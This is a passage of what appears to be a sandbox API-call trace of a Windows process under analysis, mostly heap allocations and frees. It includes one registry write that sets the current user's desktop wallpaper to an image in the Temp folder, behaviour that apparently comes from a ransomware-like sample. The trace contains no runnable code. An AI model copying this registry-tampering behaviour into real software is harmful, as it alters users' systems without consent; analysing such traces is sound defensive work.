(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0253.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0253.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0253.804] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0253.804] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0253.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73728 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0253.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0253.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.806] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0253.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0253.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0253.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0253.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0253.806] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0253.806] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0253.806] RegCloseKey (hKey=0x3c0) returned 0x0 [0253.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73728 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0253.807] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0253.807] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0253.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0253.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0253.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0253.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0253.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0253.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0253.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0253.810] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0253.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0253.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0253.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0253.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0253.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0253.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0253.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0253.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0253.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0253.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0253.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0253.813] 